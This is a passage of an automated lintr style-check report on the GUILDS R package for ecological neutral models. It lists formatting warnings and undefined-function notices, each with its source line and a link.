\"spline\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                 ~^~\n```\n[R/drawLocal.R:47:49:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                ^~\n```\n[R/drawLocal.R:47:54:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                     ^~\n```\n[R/drawLocal.R:47:64:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                              ~^~\n```\n[R/drawLocal.R:47:83:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                                 ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:58:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:59:42:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:66:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:66:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:66:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:66:16:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:66:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:68:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:68:28:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:68:31:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:68:37:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:70:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:70:28:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:70:31:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:70:37:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:74:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:76:29:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:80:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:87:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L87) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:91:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L91) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:92:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L92) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:94:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L94) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:95:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L95) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:106:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L106) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/drawLocal.R:106:66:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/drawLocal.R:107:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L107) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:110:3:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L110) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:111:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L111) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/drawLocal.R:112:28:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L112) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/drawLocal.R:112:33:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/drawLocal.R:113:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  (lgamma(allN + 1) + \n                          ^~~~\n```\n[R/drawLocal.R:113:38:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(allN + 1) + \n                                     ^\n```\n[R/drawLocal.R:114:30:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/drawLocal.R:114:42:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/drawLocal.R:115:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    allN * log(nx) + \n                    ^~~~\n```\n[R/drawLocal.R:115:37:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    allN * log(nx) + \n                                    ^\n```\n[R/drawLocal.R:116:23:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L116) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-allN) * log(ny))\n                     ~^~\n```\n[R/drawLocal.R:116:24:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    (J-allN) * log(ny))\n                       ^~~~\n```\n[R/drawLocal.R:118:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L118) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:118:44:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                           ^~~~\n```\n[R/drawLocal.R:124:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L124) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:125:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L125) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 